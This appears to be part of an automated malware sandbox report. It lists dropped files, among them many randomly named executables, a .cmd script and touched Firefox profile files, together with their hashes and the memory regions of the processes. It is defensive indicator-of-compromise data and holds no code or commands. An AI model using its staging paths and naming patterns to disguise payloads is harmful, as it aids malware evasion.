C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\Crypto\Cipher\_raw_ecb.pyd

MD5 80bb1e0e06acaf03a0b1d4ef30d14be7
SHA1 b20cac0d2f3cd803d98a2e8a25fbf65884b0b619
SHA256 5d1c2c60c4e571b88f27d4ae7d22494bed57d5ec91939e5716afa3ea7f6871f6
SHA512 2a13ab6715b818ad62267ab51e55cd54714aebf21ec9ea61c2aefd56017dc84a6b360d024f8682a2e105582b9c5fe892ecebd2bef8a492279b19ffd84bc83fa5

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\win32api.pyd

MD5 e9d8ab0e7867f5e0d40bd474a5ca288c
SHA1 e7bdf1664099c069ceea18c2922a8db049b4399a
SHA256 df724f6abd66a0549415abaa3fdf490680e6e0ce07584e964b8bfd01e187b487
SHA512 49b17e11d02ae99583f835b8ecf526cf1cf9ceab5d8fac0fbfaf45411ac43f0594f93780ae7f6cb3ebbc169a91e81dd57a37c48a8cd5e2653962ffbdcf9879bb

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\_lzma.pyd

MD5 9e94fac072a14ca9ed3f20292169e5b2
SHA1 1eeac19715ea32a65641d82a380b9fa624e3cf0d
SHA256 a46189c5bd0302029847fed934f481835cb8d06470ea3d6b97ada7d325218a9f
SHA512 b7b3d0f737dd3b88794f75a8a6614c6fb6b1a64398c6330a52a2680caf7e558038470f6f3fc024ce691f6f51a852c05f7f431ac2687f4525683ff09132a0decb

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\_bz2.pyd

MD5 30f396f8411274f15ac85b14b7b3cd3d
SHA1 d3921f39e193d89aa93c2677cbfb47bc1ede949c
SHA256 cb15d6cc7268d3a0bd17d9d9cec330a7c1768b1c911553045c73bc6920de987f
SHA512 7d997ef18e2cbc5bca20a4730129f69a6d19abdda0261b06ad28ad8a2bddcdecb12e126df9969539216f4f51467c0fe954e4776d842e7b373fe93a8246a5ca3f

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\zstandard\backend_c.pyd

MD5 0fc69d380fadbd787403e03a1539a24a
SHA1 77f067f6d50f1ec97dfed6fae31a9b801632ef17
SHA256 641e0b0fa75764812fff544c174f7c4838b57f6272eaae246eb7c483a0a35afc
SHA512 e63e200baf817717bdcde53ad664296a448123ffd055d477050b8c7efcab8e4403d525ea3c8181a609c00313f7b390edbb754f0a9278232ade7cfb685270aaf0

C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\vcruntime140_1.dll

MD5 f8dfa78045620cf8a732e67d1b1eb53d
SHA1 ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256 a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512 ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/4860-205-0x0000015768960000-0x0000015768972000-memory.dmp

memory/4860-206-0x0000015768D00000-0x0000015768D10000-memory.dmp

memory/5068-207-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

memory/2056-221-0x00000210E4E90000-0x00000210E4EB2000-memory.dmp

memory/2184-231-0x00007FF6807F0000-0x00007FF681391000-memory.dmp

memory/3452-232-0x00007FF7AB580000-0x00007FF7ACBCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

memory/5068-254-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

MD5 47177b7fbf1ce282fb87da80fd264b3f
SHA1 d07d2f9624404fa882eb94ee108f222d76bbbd4c
SHA256 e3a190fc0f3e2be612c896ad1bda174271ee57d493f1b39030de1cbb5b7090eb
SHA512 059db11d303355b85e94031a54b0e6bac30bc9e2475bf3fceb9c01063af6f593d455fb54f8893ca37a150b598a9863b04f37056ef589656a6e83da719b330db9

memory/1372-270-0x00000000007F0000-0x0000000000800000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2400-283-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe

MD5 83cd4a3ac24bea5dd2388d852288c7de
SHA1 059245d06571b62c82b059a16b046793f6753dbc
SHA256 a8bc81ff72efd02a4edf01f87d1f108886d80a2484a91e776a4e947b3f47bad1
SHA512 5133d4638db05e87daaba1b5725ddaaddb434440e31a2241732dfcc21d3f8c03212f715171d990f0fd601eb926a8a0308b93f5d8139c697399a06e891725c31c

memory/1588-318-0x0000000006340000-0x0000000006694000-memory.dmp

memory/1588-319-0x0000000006D10000-0x0000000006D5C000-memory.dmp

memory/5068-320-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2128-348-0x00000000004B0000-0x000000000096F000-memory.dmp

memory/2128-354-0x00000000004B0000-0x000000000096F000-memory.dmp

memory/2180-355-0x0000000005DB0000-0x0000000006104000-memory.dmp

memory/2400-367-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3924-370-0x0000025D99BC0000-0x0000025D99BC8000-memory.dmp

memory/3368-372-0x000000000D690000-0x000000000DF13000-memory.dmp

memory/2400-388-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4860-413-0x000001576B410000-0x000001576B938000-memory.dmp

memory/5068-414-0x0000000000450000-0x000000000090F000-memory.dmp

memory/4408-415-0x0000000000450000-0x000000000090F000-memory.dmp

memory/4924-416-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe

MD5 d054bcb257edeee50293394229ab1c67
SHA1 80f84013bdc91aa820a0534a297be285e9f0c9f8
SHA256 b4f1440eeb98201163dbc847c76b499538b6e5c05ab178ee255abe190cc7e26e
SHA512 ac52e358cd513783e130c2fd34da7d71bb25039ef4da81921b53be24b21cd5c4d83e0e000c1701b4eec9b9cf0fdd5b14a0801e240ef67efaa60cfb5a100d5f26

memory/1820-429-0x00000000002F0000-0x0000000000CF2000-memory.dmp

memory/4848-437-0x0000000000F90000-0x000000000144F000-memory.dmp

memory/4848-438-0x0000000000F90000-0x000000000144F000-memory.dmp

memory/2400-439-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/3836-467-0x0000000000F90000-0x0000000001008000-memory.dmp

memory/428-470-0x0000000000400000-0x0000000000465000-memory.dmp

memory/428-471-0x0000000000400000-0x0000000000465000-memory.dmp

memory/5068-472-0x0000000000450000-0x000000000090F000-memory.dmp

memory/4384-473-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-483-0x0000025CC5430000-0x0000025CC5450000-memory.dmp

memory/4384-482-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4924-484-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4384-474-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-486-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-488-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-487-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-485-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4384-489-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4924-490-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1820-491-0x00000000002F0000-0x0000000000CF2000-memory.dmp

memory/1820-492-0x00000000002F0000-0x0000000000CF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe

MD5 5d153f73ce1b6a907cf87ddb04ba12b2
SHA1 bfda9ee8501ae0ca60f8e1803efea482085bf699
SHA256 2af376f6a5d706982e3ac08f54d737c4c203bdc2c2c1cbf5f9fc9d4a3a775b2c
SHA512 0f6ef7ff7db227bec5d2a1dcef461313cde66b5ec38f5efd377e533ef15d87eb4aef6cf387ee7c7b63d1142a883bb18577f97dec0dcd818b93891e87f499c102

memory/2856-505-0x0000000000F70000-0x0000000001BC1000-memory.dmp

memory/4408-506-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4408-507-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1820-509-0x00000000002F0000-0x0000000000CF2000-memory.dmp

memory/2400-508-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4384-512-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

memory/4408-516-0x0000000010000000-0x000000001001C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe

MD5 8538c195a09066478922511ea1a02edf
SHA1 15e8910df845d897b4bb163caef4c6112570855b
SHA256 d5008972ddedb199731712f9fef3b3aa5a5cd666b600136a9da84656739d4e96
SHA512 60b2c66006b226140f7bf50c94c65088081b311ee92c6dea376a1349ff2380e0ce053a84b2df3be8a54bf7f7bb76f1add8417f4f1bf2fb0681e008cbd5b1725c

memory/5068-532-0x0000000000450000-0x000000000090F000-memory.dmp

memory/2232-533-0x0000000000EC0000-0x000000000136B000-memory.dmp

memory/4924-550-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2856-570-0x0000000000F70000-0x0000000001BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7CPZATFC\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2400-572-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2856-573-0x0000000000F70000-0x0000000001BC1000-memory.dmp

memory/2232-577-0x0000000000EC0000-0x000000000136B000-memory.dmp

memory/2416-579-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2856-580-0x0000000000F70000-0x0000000001BC1000-memory.dmp

memory/4384-582-0x00007FF6EFCA0000-0x00007FF6F0564000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe

MD5 2a48e7b047c5ff096c6dce52d4f26dbb
SHA1 e0d61e10b27131b1c34ade44d1a2117afd2cf099
SHA256 42642893c6a6af226aab5b2cce0875e7affebf7d1001146ddd90234d4c01492d
SHA512 75965d3aa7cda41ecc11f87b1ac2b12283d58650f5b96f2af560aff859ca74c0c0cb26dfc765b4d8318291d8f89fdbb338fb71ddf3f4b63389aedb5e2106165a

memory/2312-597-0x0000000000DE0000-0x00000000010F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe

MD5 338a31056b3b81d48a292a7bf9af67c7
SHA1 f5061e3583ba604b25e316f12fc58f40238d44b4
SHA256 cd1c085a07dc81e4305c2b9ee57e5c0433858c97cb20b1743cf44931c431ccea
SHA512 5bc7823cbd1ab6fa963df8f152d8b6de56af41159f3a736d147f1e5b4dcba3007319e2d2fb13e97f1e8b3cce3ab0d17e31d541be1ab53f8bd05a42316a940abc

memory/3352-624-0x0000000000ED0000-0x0000000001557000-memory.dmp

memory/3352-627-0x0000000000ED0000-0x0000000001557000-memory.dmp

memory/2312-633-0x0000000000DE0000-0x00000000010F4000-memory.dmp

memory/1612-638-0x00000000001D0000-0x000000000068F000-memory.dmp

memory/2312-637-0x0000000000DE0000-0x00000000010F4000-memory.dmp

memory/1612-642-0x00000000001D0000-0x000000000068F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe

MD5 c0caf5a901b162b6792eab9697827b5d
SHA1 d078ba4ad104c40bf5f2c8afda1cbdf4afc55a84
SHA256 28c182baea1726c3e851405b13f130e02817099758abab86ca9cdc3607b9f89f
SHA512 3fba4eb7a2bc21fc24a6e29495e598efc5f208db030b13de8af43a392a93e3a920e4e8e4b68e10d4dc4a0e8779401ca738172ca9cba2ddc2246854c41a8a58a5

memory/2400-671-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe

MD5 8043b20e32ff2f0c75e9a3eed0c4bf07
SHA1 5464aa1bc2a91c64cd8c4cbbb6970e8189c158a3
SHA256 69a487512dfb97f08d068d0f9dd3924f42bef46bddd79112cb206b00fc16713e
SHA512 35639c6aad3dd25f606ca72ad108f774b083fa62677772242d357d59add9bba1dc85532d58ae67277d90c04dd4a5189548ca331fe93ee086c31cacbf11b8a18c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

MD5 463a7ae0ff86b11d010a64e4c9aee7a5
SHA1 fdaf7e5fbdb90ce33364d429544e2f5d910cf5b7
SHA256 5f309e0e87c54bbd940e6399eced9492da05c17365bfe11c81638269a0e0bb6e
SHA512 faed708dc9c39c4206fc798817884ce8df4566760c0f2f530ebbc71bc24f6635ab14d6e2ebd9603c5cbaaeaaecd816314f6a54de4e7ec5204183adcf55fb7999

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\activity-stream.discovery_stream.json

MD5 1f85371e72951bbc67cd29808d0076dd
SHA1 2f3636bada3d08517e52b29525d065d6dae6cbfa
SHA256 112cbfeacdd2efb5ef37388d58009f147c4b9f3dd7dbef620b95437f5c0ecf14
SHA512 8a6b237875cb3ab5d1eda5870e276e6e3011b232d4962242581ca5d4946ce1e0d0576e62d019016aaacde13f3a3d4772b698ec3de2371e22be5c6edb5652a714

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\2a9dfd87-370d-4332-a901-a7b353c8df64

MD5 fbe16b9eb8db9ad6ad3c88ee280a6c3c
SHA1 2a3305fc7b4847d61bbaf9c2a181da0f3338316e
SHA256 b3c00109c814078cf37c2d24f10515763cebeee40c9c7912a574a8efbca97790
SHA512 17aeab6794f619f504fb98ed08aba62b31da7873e9a7d36b55d4c44d791695bb39f408f3f9876d651625c433601b4c5932cefade1731de7ecabeb6c2bb281d96

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\4c6875ae-4fb4-49b8-a3fe-4e46c2d92175

MD5 ea68e3047d8a6218fbba02c9327f4ab2
SHA1 dbada4af8da5f8d839fa536284ecc49ee559c0aa
SHA256 848912f2067591de26200b8f31f3f10f9074decf3a19338c48d5c3233f510173
SHA512 aac959380b74404a12f2c975093d68181fa329f5b53e505e931a8d5dddd013405057b18b8eb540c0c2f7dc01662e61d8eb2d1fc9d66cbae0b36a26eb83833a8e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\pending_pings\e6f59a4c-aff8-4474-929b-a6765456370a

MD5 04b827868c08d54c6c2dc88ce8829d32
SHA1 9048d17fa133afd8ba56da1b2d64113e082ae60d
SHA256 7a0be68e8300e1c665b677e87f07eed0fac1365e7673dfb4dfac4db38756ea5e
SHA512 7042b39005ab4b0c218dd6cede15102171aa0cde92ae2917dded689a410aeb6c823e6e2cb4b8bf45dbdde3575bd30d7cfc3e1b41db378a8145db53ca819d6159

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

MD5 00b5792cdd6ee60541924c478d61e7b4
SHA1 743ab572232742f62baa6161650b22fed4f58167
SHA256 a08d26cc9f7a992bd92cd95461b0b646722c347d4e64d3de081230c6c554d3d7
SHA512 8066fafbc063a277bfdd8a43d6e3e2e1018c2b6ec31952ae1f3f40ce71be1c92f1b4bb43906f74bc18f0a29e7649f7f044133ee0cfbbbe9a475223a4cf5acbc3

memory/5232-729-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5232-937-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5232-961-0x0000000000830000-0x0000000000C88000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

MD5 37b97fe6d8f879395b2f1f8aa5d6afe3
SHA1 9347bbdc4e4f13b1c4657da2c5b6a2d592c99f36
SHA256 4b36bbe6cf4ecd8dff24eba20cfd455efb5cb7aadbf154b02eb91250fc6eaa30
SHA512 4107bf08ebbe7cf58433104bad79357c8b95f9e406365bce62f01123602fd8afaa5085329de57d23cdf9c9f77bcc021eec9ef3e10eff715b17a591754ce9c8b7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs.js

MD5 53d96046f8aebeab5fedf92ce63217cb
SHA1 f19a6e7b886a92f7e59e6ffeab11c6b30aa9bfa6
SHA256 df7aaad4ae8a6b23a17c763945119c00f3ad5cfbe2e89dac981b0d9e570bd171
SHA512 cd050891afc687dda0f4f57f9dfab81660294ac218ee88e1b3d37b17148aa3460e606f07c3e181915dddbb4ac3761306787ed92ac86ee4e4803529b3f7d39ce0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

MD5 b8a837f08a624d85f0243557d120a683
SHA1 6172baed2ac554d5e5d0157fc3dffa2ce66cb880
SHA256 911c444d68d4a7b61c6f3789635fcb4a62a841266ec4c2577fe156827d757233
SHA512 f95e5ae12ae8bc6bb71a27d007675aaebf2ca1c9b77621488b2a2cb21aac7748cb62d2516d118309d525c0b73a1d0fc756e2fefaaea4a1ff2268d1dd57cf3151

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\AlternateServices.bin

MD5 1d946d1e8be7221f7e28eb9a1b85d9bc
SHA1 da446331a66e7bb442350b298ed6f77fda6a09c9
SHA256 fd96defb65af0bd52250a9540199495382f66ea06d55a890cbb40122c30eacf6
SHA512 9e7880a5c7652e66cc7da07a0324cb638aa244d5564e20a5e72a913ba0b16c2b9552f1420f05cdb1957609949f36d0230e8e05f5eaa6341468b7a232409a7cf6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

MD5 fffc47194bae0e547af96e1b33d6b77d
SHA1 c543a27c59b3451a57bf262d58e74fa2f3f2adca
SHA256 a7ccfddc6c66f775230e77d9cc2c2f55c8261ede22445db699c5a8800a42a628
SHA512 f56484bc23d69f629e0e5e8bbe4880b89143677f1ecd6562ba12e45e604cf66e2a9863919e8bb76ca77a5c1562c9dedee4228956e4970c9bf0483d3203ee0f49

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EEUCUS8F\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/5232-1096-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5232-1105-0x0000000000830000-0x0000000000C88000-memory.dmp

memory/5712-1107-0x0000000000450000-0x000000000090F000-memory.dmp

memory/5712-1109-0x0000000000450000-0x000000000090F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\datareporting\glean\db\data.safe.tmp

MD5 ece6efc63f8f53510b3dca9b20f9ab12
SHA1 fc744e5fefe97f8649fd4533233bca4b1398fd4a
SHA256 0e3f22c0070fa9cadea1a99531b4ae39b3eebd0e52c1a4be40ba6bf228747584
SHA512 756e4dbd2929b5f15458113c3fdf7c6391dbb3bb2ad681d544275e565b7a4d1d039820a39e7c0293039de504f6874556c69b8da31a9bc511e2233d83938b4851

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

MD5 9518958f576f9811e1c10a20e4e4e880
SHA1 aa0a284e664da53808f83d08050544be945ec2ca
SHA256 ad65974bfacbb2c599381ac478b8c8973805ba495d5176a43916f5cf267aecf2
SHA512 43db5294a9cde8ae222904dd79f655df62b48accce887cafd8e650b5d7869a80c5c6d3c0499f89b1b7c3f7e62c6df8b05854dc4e72e7e392285f2793a846b574

C:\Users\Admin\AppData\Local\Temp\10107970101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/5496-1216-0x0000000000270000-0x000000000095E000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 6634e045ea77c37dde6391b4498eee78
SHA1 fa57d63bfc6565a985f894fbaacee45e1652062d
SHA256 01016ee7a7abcd878e0aada10300bd6ca2323c5a31efd6583f7211abb2116463
SHA512 5bb515b22347e3abae5286a549c74e48c7d5eaa2426193b82ad83d2bc70271bbc972d147703d549acd3c40da61e8f050ff34c07dbd2b0166aea9446c359c4803

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 ff086d402e40fbec7605ed7319475754
SHA1 780dc8b4a7029c913db2cb6014d103b2f196c115
SHA256 ecee1b046b8dfd41c7c39e1689630f345edc313a3ba532daefe694602e499f99
SHA512 3091c3be3ff8944cf2c192f84e22b148bd3156167cd7ce5bd35f479e18971869fc362b30faba8c2dc060d29711533e460760e0d35d11bc03c07ad46c50e91f36

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\58tontji.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

MD5 d176c8de49b621a746acd1e113f81b0b
SHA1 38a90a32b2b131e52a08a75543faae98872480be
SHA256 357332277d1b6c8507dd937e50f5035c80b464d029598a4be632919c039df171
SHA512 c5f53252844ccaec5ecc39573c10538d327fee4beeedb30660789873172022c13aa7c7859832b391cae7f192a63571cf8e0b90d22b97cbcfba4691d28a6a75cf

C:\Users\Admin\AppData\Local\Temp\10107980101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/5640-1568-0x0000000000070000-0x0000000000511000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\58tontji.default-release\prefs-1.js

MD5 3164eac1799c58364a773c6f346dd59a
SHA1 db6580fff234ad86eb134fe60443b329b6bff766
SHA256 259185460ee226000fa274f22d108bbdf906dc182d936ed5870e86b85e5fece0
SHA512 8d8870c176675cd5d0afc61cadc7f6615b44f190752bb296a70317a7d65e59b3cf9d703b5ff66077b717f54f38af5cc885377d78c08f9a8b3d65fbedd1113185

C:\ProgramData\72B093CA62FBDFDF.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
